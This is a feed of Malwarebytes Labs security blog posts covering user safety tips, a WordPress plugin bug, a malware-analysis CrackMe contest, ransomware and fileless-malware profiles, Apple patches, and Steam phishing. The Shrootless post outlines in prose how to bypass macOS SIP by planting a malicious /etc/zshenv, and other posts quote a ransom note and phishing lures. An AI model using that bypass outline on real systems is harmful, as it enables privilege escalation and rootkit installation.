IT NEWS

This post was authored by one of the most active helpers on the Malwarebytes forums who wishes to remain anonymous.

Back in the early days of personal computing, perhaps one of the only real concerns was data loss from a drive failure. That risk still exists, but we all face many other threats today too.

There are rootkits, Trojans, worms, viruses, ransomware, phishing, identity theft, and social engineering to worry about. And that’s not a comprehensive list.

So how can you avoid becoming victim?

Security tips

Practice good security measures such as slowing down and thinking before clicking on things. Use a strong and unique password for all accounts and sites. A long passphrase that cannot be found in a dictionary is one recommendation for a strong password; the use of a Password Manager is highly recommended. When possible, you should use multi-factor authentication (MFA) to help protect your accounts. Keep your operating system and installed software up to date. Check with both your Operating System vendor, Device vendor, and Software vendor frequently for security updates.

Pay close attention to the license agreements and installation screens when installing anything. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other third party software will also be installed. Take great care in every stage of the process and every offer screen, and make sure you know what it is you’re agreeing to before you click “Next.”

Avoid using Peer-to-Peer (P2P) file-sharing programs if possible. Likewise, avoid keygens, cracks, and other pirated software that can often compromise your data, privacy, or both.

Today, content blockers have become essential to help reduce ads, Trojans, phishing, and other undesirable content that an antivirus product alone may not cover. In addition, disabling browser push technology is recommended as it has become a source of abuse. Hover your mouse over website links and review where they actually go when possible, don’t just click on them. Consider using DuckDuckGo or StartPage as a home page and search provider in your browser to help improve your security and privacy.

Whether it’s your email, phone, messenger, or other applications, always be alert and on guard for someone trying to trick you into clicking on links or replying to a message. If someone is not on your address or contacts list, all the more reason to be suspicious. Never open attachments that come in unexpectedly in email, no matter how enticing. Even if from friends or family, always be cautious. If possible, save the attachment first, and have a site such as VirusTotal scan and confirm the attachment is not a threat before opening it.

Make sure you’re backing up your data frequently and validate that the data can be restored. It is highly recommended that you backup to an external device such as a USB drive for all of your essential data, and do not keep the backup drive connected to the system all the time. It should only be connected to do the backup, and then once the backup has been completed, disconnected. That’s because if your computer were to become infected and the backup drive was connected, the infection could potentially infect, delete, or encrypt your backup, rendering it useless. Never connect the backup drive to the computer if you suspect that you might potentially have an infection until you clean the computer or device.

Support forums such as Malwarebytes Forums and a few others have members or staff that are highly trained and can assist you further if you have specific questions or issues about your devices or security, or would like more details on any particular information shared in this article.

URL links with further information or access to the programs mentioned:

Malwarebytes Support Forum
https://forums.malwarebytes.com

Tips to help protect from infection
https://forums.malwarebytes.com/topic/258363-tips-to-help-protect-from-infection/

Privacy – protecting your digital footprint
https://www.sans.org/newsletters/ouch/ouch-april-2021/

Do I need a Windows Registry Cleaner?
https://forums.malwarebytes.com/topic/126481-do-i-need-a-windows-registry-cleaner/

Backup your data
https://forums.malwarebytes.com/topic/136226-backup-software/

Content blockers

Malwarebytes Browser Guard
https://www.malwarebytes.com/browserguard/

uBlock Origin

• https://addons.mozilla.org/addon/ublock-origin/
• https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm

NoScript Security Suite
https://addons.mozilla.org/en-US/firefox/addon/noscript/

Web Browser recommendations
https://www.privacytools.io/browsers/

Delete cookies automatically | Cookie AutoDelete plugin

https://github.com/Cookie-AutoDelete/Cookie-AutoDelete
https://chrome.google.com/webstore/detail/cookie-autodelete/fhcgjolkccmbidfldomjliifgaodjagh
https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/

Browser push notifications: a feature asking to be abused
https://blog.malwarebytes.com/security-world/technology/2019/01/browser-push-notifications-feature-asking-abused/

The post Tips to protect your data, security, and privacy from a hands-on expert appeared first on Malwarebytes Labs.

WordPress, the incredibly popular content management platform, is currently dealing with a nasty plugin bug which allows redirects.

What is a WordPress plugin?

Like most blogging platforms, WordPress allows you to change up its default functionality. This is done by adding bits of kit called plugins. Some will be from WordPress itself, others are created and maintained by third parties. Any plugin can be potentially unsafe, or coded poorly, or compromised in some way. It’s also entirely possible for rogues to make their own innocent looking plugin and cause chaos.

Plugins are often in the news for these kinds of problems. Just this month, we covered a WordPress plugin susceptible to multiple vulnerabilities. Last month, it was a plugin leaving shoppers vulnerable to cross site scripting bugs and a form of JavaScript injection. There are so many plugins that it’s a surefire bet another plugin will be the latest compromise before long. And even when it’s not possible to be 100% sure a plugin was involved in an attack, you can end up with a bad situation very quickly. Shall we see what’s happened this time?

Bug causes problems for up to 1 million sites

Yes, an astonishing 1 million WordPress sites have been affected this time around. A plugin called OptinMonster is a tool designed to make your site “sticky”. That is, keep people around for longer, convert interest to sales, sign up to newsletters, build up elements of your site, and more.

This plugin relies on API endpoints to do its job. An API is an Application Programming Interface, and you can read a fantastic plain-English description of what an API is and does here.

Sadly, it seems some of the endpoints weren’t secure, and attackers with API keys designed for use with the OptinMonster service could get up to no good. Changes could be made to accounts, or malicious code could be placed on the site without a visitor’s knowledge.

CVE-2021-39341

The bug, known as CVE-2021-39341 and discovered at the end of September, has been addressed by the OptinMonster developers. Stolen API keys have been invalidated, and a patch was released on the October 7. It’s possible more updates may appear over the next few weeks.

What should I do if I have OptinMonster on my website?

If your API key has been revoked, you’ll have to create a new one. You should also ensure your plugin is kept up to date. In fact, you should be doing this for all of your plugins. It may be worth checking if they’re still maintained, and browsing the latest reviews to see if people are suddenly complaining about peculiar activity.

If you have plugins installed which you don’t use at all, or only very rarely, it may be worth having a spring clean. Often we rush to install dozens of plugins on a new website, and before we know it, we’ve forgotten what half of them are. There they sit, for months or years, just waiting for a juicy vulnerability to come along. Why take the risk?

There’s a number of ways you can keep your WordPress site safe from harm where plugins are concerned. Our advice is to devote some time to digging through the weeds and see what exactly you have lurking in the undergrowth.

The post Update your OptinMonster WordPress plugin immediately appeared first on Malwarebytes Labs.

This blog post was authored by Hasherezade

Twice in the past (2017, 2018) we published a Capture-The-Flag challenge dedicated to aspiring malware analysts. Each time it was a Windows executable, containing up to 3 stages to break, in order to get the final flag. The goal of the crackme was to provide an exercise where the contestants will be able to challenge themselves in understanding and overcoming techniques commonly present in real-life malware. Yet we present them on a harmless example.

After a long break, we decided to resume our small contest, and possibly make it an annual event. Without further overdue, we present you the Malwarebytes CrackMe number 3!

Rules of the contest

The rules remain mostly unchanged since the second edition. As before we have two parallel tracks of the contest:

1. The fastest solve. The three earliest submitted flags win. The flag should be submitted along with (minimalist) notes about the steps taken to find it. (No detailed write-up is required.) Any updates about the known winners in this category will be appended to this post.
2. The best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide the explanation of the techniques used in the challenge. The write-up submissions closes two weeks after the start of the challenge.

In each track we will select three winners that will be rewarded with unique Malwarebytes swag. The first place winner in each category will additionally get any IT-related book of their choice. All the solvers are going to be listed in our hall of fame.

The flag is in format: flag{...}

Submissions to both contests should be sent as a private message to the Twitter account: @hasherezade.

Three weeks after the challenge started we will publish the closing summary, along with the detailed walk-through, provided by the author.

WARNING: We are sorry, but Malwarebytes employees and people who had the access to the CrackMe before the official publication are not allowed to participate.

The application

The application is a Windows executable. It was tested on Windows 8 and above.

WARNING: please mind the fact that since the CrackMe contains techniques similar to those used in malware, it may be flagged by various AV products. It is a known false-positive. We recommend to run it on a VM, with Windows Defender disabled.

You can download it here.

Best of luck, and have fun!

Hall of fame

We already have the first winner in the category “the fastest solve”:

1. @nazywam

Who will be next?

The post The return of the Malwarebytes CrackMe appeared first on Malwarebytes Labs.

Microsoft researchers have discovered a vulnerability in macOS, dubbed Shrootless, that can allow attackers to bypass System Integrity Protection (SIP) and perform malicious activities, such as gaining root privileges and installing rootkits on vulnerable devices.

Microsoft reported the Shrootless attack to Apple’s security team earlier this year, together with a proof-of-concept that showed how the bug could be abused to install a malicious kernel extension (rootkit).

What is SIP?

SIP which is also known as “rootless” is designed to lock down the system from root by leveraging the Apple sandbox to protect the entire platform. Being able to bypass SIP basically gives the attacker full control of the system, because they can run arbitrary code without the protection kicking in.

Step by step, Apple has hardened SIP over the years against attacks by improving and finetuning the restrictions. One of the most effective SIP restrictions is the filesystem restriction. Without these restrictions, an attacker would be able to access and drop files in an area of the file system that is not intended for application files. The amount of damage an attacker can do to a device’s critical components is directly based on their ability to write unrestricted data to disk.

Since the filesystem restrictions are so powerful, Apple had to implement some exceptions. One of those exceptions is the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.

The vulnerability

The Shrootless vulnerability could be used by an attacker to modify protected parts of the file system by abusing inherited permissions. Microsoft shared its findings with Apple through Coordinated Vulnerability Disclosure (CVD). The vulnerability exists in the macOS Big Sur and Monterey operating systems and was patched by Apple on October 25, 2021.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Shrootless is listed under  CVE-2021-30892.

The researchers found that during the installation process of a new application, an attacker could hijack the installation process by creating a specially crafted post-installation script and placing it in the location where the installation process looks for the post-installation script.

The gritty details

The method to use this vulnerability is pretty straightforward.

• Download an Apple-signed package (using wget) that is known to have a post-install script. When installing an Apple-signed package (.pkg file), the said package invokes system_installd, which then takes charge of installing the former.
• Plant a malicious /etc/zshenv that would check for its parent process. If it’s system_installd, then it would be able to write to restricted locations. If the package that is being installed contains any post-install scripts, system_installd runs them by invoking a default shell, which is zsh on macOS. Interestingly, when zsh starts, it looks for the file /etc/zshenv, and runs commands from that file automatically, if it exists.
• Invoke the installer utility to install the package. This will invoke system_installd and because we used a package with a post-install script, zsh is invoked and executes the commands in the file we planted.

This way the Shrootless attack bypasses the SIP and effectively gives the attacker root access. As you will understand from this description the attacker will need some access to the system to begin with or they will not be able to plant the necessary /etc/zshenv.

Mitigation

The easiest and best way to avoid falling victim to this vulnerability is to update to macOS Big Sur 11.6.1 or better.

Stay safe, everyone!

The post Shrootless: Microsoft finds Apple macOS vulnerability appeared first on Malwarebytes Labs.

Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. The malicious payload exists in the computer’s memory, which means nothing is ever written directly to the hard drive.

For an attacker, fileless malware has two major advantages:

• There is no file for traditional anti-virus software to detect.
• There is nothing on the hard drive for forensics to discover.

As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. Which makes fileless malware a step forward in the arms race between malware and security products.

Is fileless malware new?

Fileless malware attacks have been around for 20 years at least. The first malware to be classified as fileless was the Code Red Worm, which ran rampant in 2001, attacking computers running Microsoft’s Internet Information Services (IIS).

But in the last few years fileless attacks have become more prevalent. Four years ago, the Ponemon Institute’s “The State of Endpoint Security Risk Report,” reported that 77 percent of compromised attacks in 2017 were fileless, and that fileless attacks were ten times more likely to succeed. We noted the trend ourselves, with an overview of fileless attacks in 2018.

How is fileless malware delivered?

In the case of the Code Red Worm, the malware exploited a buffer overflow vulnerability that allowed it to write itself directly into memory. Modern ransomware attacks sometimes rely on PowerShell commands that execute code stored on public websites like Pastebin or GitHub.

Fileless malware attacks have also been seen hiding their code inside existing benign files or invisible registry keys. Some use the so-called CactusTorch framework in a malicious document. And sometimes the malicious code does exist on a hard disk, just not on the one that belongs to the affected computer. For example, “USB thief” resides on infected USB devices installed as a plugin in popular portable software. It gathers information on the targeted system and writes that to the USB device.

How to create fileless malware

Our esteemed colleague Vasilios Hioureas has written a walk-through by demonstrating some of his own fileless malware attacks. His write-up also nicely demonstrates what modern anti-malware solutions need to do to protect their users against fileless malware attacks. Showing that modern-day solutions must contain technology to dynamically detect malicious activity on the system rather than simply detecting malicious files. Old-school signature-based detection is useless when dealing with fileless malware.

What can fileless malware do?

In essence, fileless malware can do anything that “regular” malware can do, but for practical reasons you will often see that there is a limited amount of malicious, fileless code. For more complex programs like ransomware, the fileless malware might act as a dropper, which means the first stage downloads and executes the bigger program which is the actual payload. And, of course, fileless malware can use native, legitimate tools built into a system during a cyberattack.

The most common use cases for fileless malware are:

• Initial access. The first step of a cyberattack is to gain a foothold on a system. This can be stealing credentials or exploiting a vulnerability in an access point.
• Harvest credentials. Fileless malware is sometimes used to hunting for credentials, so an attacker can use alternative entry points or elevate their privileges,
• Persistence. To ensure they have permanent access to a compromised system, an attacker might use fileless malware to create a backdoor.
• Data exfiltration. An attacker might use fileless malware to hunt for useful information, such as a victim’s network configuration.
• Dropper and/or payload. A dropper downloads and starts other malware (the payload) on a compromised system. The payload may come as a file, or it can be read from a remote server and loaded into memory directly.

Fileless malware detection

So, how can we find these fileless critters? Behavioral analysis and centralized management are key techniques for detecting and stopping fileless malware attacks. Knowing how to identify attacks and having an overview of the attack surface however is easier said than done.

What you need is anti-malware software that uses behavioral analysis, ideally supported by an Artificial Intelligence (AI) component. And for a large attack surface you will need something like a Security Information Event Management (SIEM) system to tie all the alerts and detections together.

In short, detecting malware is no longer a matter of detecting malicious files, but more and more a matter of detecting malicious behavior.

Stay safe, everyone!

The post What is fileless malware? appeared first on Malwarebytes Labs.

Ranzy Locker ransomware emerged in late 2020, when the variant began to target victims in the United States. According to a flash alert issued by the FBI, unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021, including victims in the construction, academic, government, IT, and transportation sectors. Ranzy Locker is a successor of ThunderX and AKO ransomware.

Ransomware-as-a-Service 

The group behind Ranzy Locker is not very different in its business approach from other “big game” ransomware gangs. The ransomware is made available using the Ransomware-as-a-Service (RaaS) model, which allows the developers to profit from cybercriminal affiliates who deploy it against victims. It also runs a leak site where data stolen from victims who refuse to pay a ransom is published.

RDP again, and Exchange

Where the business model is no surprise, the same can be said about the attack methods that Ranzy Locker affiliates deploy to gain initial access. According to the same FBI alert a majority of victims reported that the threat actors conducted brute force attacks targeting Remote Desktop Protocol (RDP) credentials to gain access to the victims’ networks. Recent targets reported the actors leveraged known Microsoft Exchange Server vulnerabilities and phishing as the means of compromising their networks. 

Older, and now less frequent attack methods included malicious spam, and use of the RIG exploit kit, which was previously used to spread Princess ransomware. 

Recognizing Ranzy Locker 

So, how can you tell whether you have been hit by Ranzy Locker or one of the other, many, ransomware variants out there? Well, for starters you can tell from the header of the ransom note which is named readme.txt. 

---=== Ranzy Locker 1.1 ===---

Attention! Your network has been locked.
Your computers and server are locked now.
All encrypted files have extension: .ranzy

---- How to restore my files? ----

All files on each host in your network encrypted with strongest encryption algorithms
Backups are deleted or formatted, do not worry, we can help you restore your files

Files can be decrypted only with private key - this key stored on our servers
You have only one way for return your files back - contact us and receive universal decryption program

Do not worry about guarantees - you can decrypt any 3 files FOR FREE as guarantee

Some variants also use file extensions for the encrypted files that show Ranzy Locker was at work. Those extensions are .RNZ, .ranzy, and .RANZYLOCKED, but there are also some that are less helpful and add a random 6 character string. 

Behavior 

A typical series of actions performed Ranzy Locker ransomware is: 

• Find and delete shadow volume copies, and other recent backups, and disable the Windows recovery environment. 
• Run the encryption process but skip files that have .exe, .dll, .sys, .ini, .lnk, .key, .rdp extensions; and exclude paths with strings including AppData, boot, PerfLogs, PerfBoot, Intel, Microsoft, Windows and Tor Browser. 
• Look for connected machines on the network.
• Drops the ransom note on the desktop of the affected system. 

From what we have noticed, the double-extortion tactic—encrypting and exfiltrating data—is only used on some victims, probably depending on the size of the company and the type of data that was stolen. 

Mitigation 

Based on the behavior of Ranzy Locker, the FBI recommends the following mitigation strategies: 

• Store regular backups of your data off-site and offline, where attackers can’t reach them.
• Implement network segmentation, so that an attacker can’t reach all the machines on your network from one compromised foothold.
• Install and regularly update anti-malware software on all hosts and enable real-time detection. 
• Install security updates for software, operating systems, and firmware as soon as they are released.
• Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.  
• Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
• Disable unused remote access ports and monitor remote access logs for any unusual activity.  
• Consider adding an email banner to emails received from outside your organization.  
• Disable hyperlinks in received emails.
• Use double authentication when logging into accounts or services.

We would like to add Brute Force Protection to that list. 

IOCs 

Besides the characteristics mentioned in this post, the FBI points to a sample YARA rule for Ranzy Locker, which can be found here.

 Stay safe, everyone! 

The post Threat profile: Ranzy Locker ransomware appeared first on Malwarebytes Labs.

On two consecutive days Apple has released a few important patches. iOS 14.8.1 comes just a month after releasing iOS 14.8 for those who didn’t want to update their iPhones to iOS 15. This update also came as a sort of surprise as it was not beta-tested beforehand.

Earlier this year Apple announced that users would have a choice between updating to iOS 15 as soon as it’s released, or staying on iOS 14 but still receiving important security updates.

Now the differences are starting to show. As you can see in the table below, some patches are specific for 14.8.1 and some are specific for 15.1, while many are shared between them. In total 24 CVEs were covered.

The ones that stood out

Apple is, for understandable reasons, always a bit secretive about what was fixed, but from what we were able to figure out, these are the most worrying ones by type of vulnerability.

Elevation of privileges

CVE-2021-30906: Due to a vulnerability in the iCloud component of watchOS, a local attacker may be able to elevate their privileges. A simple authentication is needed for exploitation.

CVE-2021-30907: Due to a vulnerability in the Audio component of watchOS, a malicious application may be able to elevate privileges. An attack has to be approached locally. A single authentication is needed for exploitation.

Arbitrary code execution

CVE-2021-30881: Due to a vulnerability in the FileProvider component of watchOS, unpacking a maliciously crafted archive may lead to arbitrary code execution. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction.

CVE-2021-30883: Due to a vulnerability in the IOMobileFrameBuffer component of  Apple tvOS, an application may be able to execute arbitrary code with kernel privileges. This issue may have been actively exploited. As previously discussed here.

CVE-2021-30886: Due to a vulnerability in the kernel component of Apple tvOS (Digital Media Player), an application may be able to execute arbitrary code with kernel privileges. Attacking locally is a requirement. A single authentication is required for exploitation.

CVE-2021-30889: Due to a vulnerability in the WebKit component of Apple tvOS, processing maliciously crafted web content may lead to arbitrary code execution. The attack can be launched remotely. The exploitation doesn’t need any form of authentication. It demands that the victim is doing some kind of user interaction.

CVE-2021-30894: Due to a vulnerability in the Image Processing component of the Smartphone OS, an application may be able to execute arbitrary code with kernel privileges. The attack needs to be approached locally. The requirement for exploitation is authentication.

CVE-2021-30900: Due to a vulnerability in the GPU Drivers component of the Smartphone OS, a malicious application may be able to execute arbitrary code with kernel privileges. An attack has to be approached locally. Authentication is required for exploitation.

CVE-2021-30902: Due to a vulnerability in the Voice Control component of the Smartphone OS, a local attacker may be able to cause unexpected application termination or arbitrary code execution. Required for exploitation is a simple authentication.

CVE-2021-30903: Due to a vulnerability in the Continuity Camera component of the Smartphone OS, a local attacker may be able to cause unexpected application termination or arbitrary code execution. The requirement for exploitation is a simple authentication.

CVE-2021-30909: A vulnerability was found in the kernel component of Apple macOS up to 12.0. An application may be able to execute arbitrary code with kernel privileges. Attacking locally is a requirement. The successful exploitation requires a simple authentication.

CVE-2021-30914: Due to a vulnerability in the GPU Drivers component of the Smartphone OS, an application may be able to execute arbitrary code with kernel privileges. Local access is required to approach this attack. A single authentication is necessary for exploitation.

CVE-2021-30916: Due to a vulnerability in the kernel component of the Smartphone OS, a malicious application may be able to execute arbitrary code with kernel privileges. Attacking locally is a requirement. The successful exploitation needs authentication.

CVE-2021-30917: Due to a vulnerability in the ColorSync component of watchOS, processing a maliciously crafted image may lead to arbitrary code execution. The attack may be launched remotely. No form of authentication is required for exploitation. Successful exploitation requires user interaction by the victim.

CVE-2021-30919: Due to a vulnerability in the CoreGraphics component of the Smartphone OS, processing a maliciously crafted PDF may lead to arbitrary code execution. The attack can be launched remotely. The exploitation doesn’t need any form of authentication. It demands that the victim is doing some kind of user interaction.

Mitigation

Apple advises users to update to iOS 15.1 and iPadOS 15.1 or iOS 14.8.1 and iPadOS 14.8.1 which can be done through the automatic update function or iTunes.

Stay safe, everyone!

The post Update now! Apple patches bugs in iOS and iPadOS appeared first on Malwarebytes Labs.

Have you ever had someone run up to you in the street and insist you take their free knife? I hope not, because that’s a good way to wind up in a 60-minute police procedural drama. In video game land, however, anything goes. A certain type of scam is showing signs of activity at the moment and it’s likely to claim some victims before the week is out.

It involves, wait for it: someone digitally running up to you and insisting you take their free knife.

Free knife? What do you mean?

Many games on Steam make use of skins. These are fancy overlays of in-game items. You may not impress someone with your boring old default knife, or gun, or item of clothing. A rare graphical enhancement which makes said item look incredibly distinctive, however? Now you’re talking.

Skins are most commonly traded in-game. Sometimes they’re sold for virtual or real cash, although depending on the game, using real money may be against the terms of service. A few games have their trading systems deeply embedded into game platforms. For example, Steam has its own marketplace for transactions.

Are skins used in scams?

Oh boy, are they ever. One of the oldest scams around is skin phishing. The phisher will create a fake marketplace, or an imitation of a real game-themed lounge, or even just a fake user’s trading inventory page. Account compromise, and/or malware usually follows.

What does this particular scam involve?

It’s a tactic designed to scam people in the fastest way imaginable. What the scammer does can charitably be described as “minimal”. In short, they’ll send a message to potential victims on Steam or on services such as Discord. There are variations in messaging, but the essence remains the same.

“Yo, I don’t know you unfortunately, but this is for you, I do not need that knife [link]”

“I haven’t met you unfortunately (or not lol), but take it, I dont don’t need that skin [link]”

“G’day – I don’t need this bayonet just take it [link]”

Note the similarities in the first and second messages. It’s hard to say if the messages are manually typed out or automated, but we seem to be peeking at the typical indicators of a deliberate decision to try this tactic out.

Once the account is phished, the victim will have to go through Steam support to try and recover it. Accounts can have an awful lot of money tied to them. There may be thousands of dollars worth of titles bound to it. It may have hundreds of dollars in the user’s Steam wallet. There could be a ton of rare items, gifts, and other content sitting in the user’s Inventory page. Pretty much anything in there is at risk once the scammer gets their claws into the account, and account recovery can be rather stressful at the best of times.

How can I keep my Steam account secure?

Steam has a comprehensive list of security tips for its users. They include everything from phishing tips and general safety advice to account verification and two-factor authentication.

As for the free knives, bayonets, and anything else? Leave the mysterious strangers and their too-good-to-be-true murder objects to the crime dramas and keep that police cordon up around your Steam account.

The post Watch out for the Steam skin “free knife” scam appeared first on Malwarebytes Labs.

We talked to members of our Malware Removal Support team and asked them what kind of problems they get asked to solve for our customers.

To understand why they get to handle these questions, it is also necessary to know that the Malwarebytes software is unable to resolve the problems users are facing. Many of these problems can be categorized under the header of trusting the wrong people.

Privacy concerns

You know how it freaks people out when Facebook shows them advertisements for things they have only just thought about buying? Many wonder how Facebook knows this.

They say, “I haven’t searched for the item yet, but here they are showing me this advertisement.”

It gets even worse when people have had a private conversation about it, and they think the advertisers or the platform has been eavesdropping on them.

Most of the time that is not true. So, how do the platforms know what ads to serve you?

• Algorithms are smarter than most people think. Have you heard the story about the family that got coupons for baby cloths and cribs even before their daughter told them she was expecting? We humans are way more predictable than we’d like to think.
• Users of social media and Facebook in particular tend to forget how many people can see the “public” part of their profile and posts.
• Websites share information about your scrolling behavior through cookies, FLoC, and other trackers.

Some people get so convinced they have spyware on their system that they contact our support team to help them get rid of it. All we can do is inform the public and point those looking for help in the right direction.

More Facebook concerns

Besides people not securing their Facebook settings and making everything public, they also make more blatant mistakes like posting their email addresses, clicking on links to surveys in Facebook, clicking on unsolicited links in Messenger, and answering posts that phish for information that makes it easier to guess your passwords.

This comment by one MRS agent during our discussion says a lot:

“I had 2 friends on Facebook today get their profiles taken over because they clicked links they shouldn’t have clicked.”

In cases where these mishaps go wrong, all our Support team can do is tell people they have to contact Facebook as unfortunately we can’t help them.

Other password shenanigans

Another privacy related concern we often get asked about are the sextortion emails that try to intimidate the recipient by telling them the attacker has their password. But that password usually originates from some security breach and the sender has just found it in a data dump somewhere. A quick way to check is a visit to the Have I been Pwned? website.

If you do get an email like this, you should change the password anywhere you use it. And please use Multi-Factor Authentication wherever possible.

Social media and scams

Social media is a perfect way for scammers to reach a lot of people, and we often see them using this to round up victims. There are many kinds of Bitcoin scams to be found on YouTube, Twitter, and other platforms. And along with Tech Support scams, Ponzi schemes, misinformation, and many phishing attempts, you can find every kind of scammer on social media without having to look very hard.

A few more tips

To round this off we assembled a few other mistakes our team sees a lot. So steering clear of these can save you a lot of trouble.

• Letting browsers save their passwords. Use a password manager or password book for them, especially if you are sharing your system with others.
• Never backing up their system. We understand it can be cumbersome, but imagine the misery when you lose access, be it because of ransomware or a hard drive failure.
• Using cracks and keygens. The oldest trick in the book to spread malware is to tell visitors that it is a crack or keygen for a popular game or other software.
• Using torrent software. The same as for cracks and keygens applies here—unless you can verify what you are receiving, don’t download anything from anyone.

Stay safe, everyone!

The post How social media mistakes can impact cybersecurity appeared first on Malwarebytes Labs.

In a Firefox security announcement, Mozilla said 455,000 users have downloaded Firefox add-ons that interfere with how they connect to the internet.

The interference in itself was not the deciding factor, however. The add-ons abused the proxy API to prevent users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content.

What is the proxy API?

The proxy API can be used by add-on developers as an event listener to intercept web requests, and return an object that describes whether and how to proxy them. Add-ons that use the proxy API need the “proxy” permission. And where they want to intercept requests, they also need “host” permission for the URLs of intercepted requests.

Google Chrome provides an extension API also called “proxy” which is functionally similar to this API, in that extensions can use it to implement a proxying policy. However, the design of the Chrome API is completely different to this API. They are incompatible, which means using both is NOT recommended as it may result in connectivity issues.

Abuse cases

Mozilla says the add-ons were advertised to users as being able bypass paywall restrictions on websites. It is unknown whether the blocking of updates was intentional and whether the add-ons were performing other malicious actions.

Mozilla has blocked the malicious add-ons so they are not installed by anyone else. Starting with Firefox 91.1, Firefox now includes changes to fall back to direct connections when Firefox makes an important request (such as those for updates) via a proxy configuration that fails. By doing so, users can not be denied important updates.

Mitigation

Mozilla stopped accepting add-on submissions that use the proxy API until fixes were available for all users.

One of those fixes lies in the fact that Mozilla deployed a system add-on named “Proxy Failover” (ID: proxy-failover@mozilla.com) with additional mitigations, and that has been shipped to both current and older Firefox versions. This system add-on implements failover rules for system requests over malfunctioning proxies. In other words, If a proxied system request fails, the proxy configuration in use will be disabled.

As usual, make sure your browser is up to date. The latest version of the Firefox Standard Release for Desktop is at 93.0.

In case you are not running the latest version, and have not disabled updates, you might want to check if you are affected by this issue. First, try updating Firefox manually (In the menu click Settings > on the General tab scroll down to > Firefox Updates > click on the Check for updates button). Recent versions of Firefox come with an updated blocklist that automatically disables the malicious add-ons. So you should be able to get an update.

If that does not work you are advised to check In the Add-ons section, and search for one of the following entries:

• Name: Bypass ID: {7c3a8b88-4dc9-4487-b7f9-736b5f38b957}
• Name: Bypass XM ID: {d61552ef-e2a6-4fb5-bf67-8990f0014957}

Please make sure the ID matches exactly as there might be other, unrelated add-ons using those or similar names. If none of those IDs are shown in the list, you are not affected.

If you do find one of these entries, you can remove the add-on under the Add-ons and themes section of the menu, by clicking on the three horizontal dots and select Remove from the dropdown menu.

Using the proxy API going forward

Developers that wish to use the proxy API for legitimate reasons are asked to include a strict_min_version key in their manifest.json files targeting “91.1” or above. This will make sure that the users will not suffer blocked updates and it will expedite the review for your add-on.

Stay safe everyone

The post Patch now to bypass Firefox add-ons that abuse the proxy API to deny updates appeared first on Malwarebytes Labs.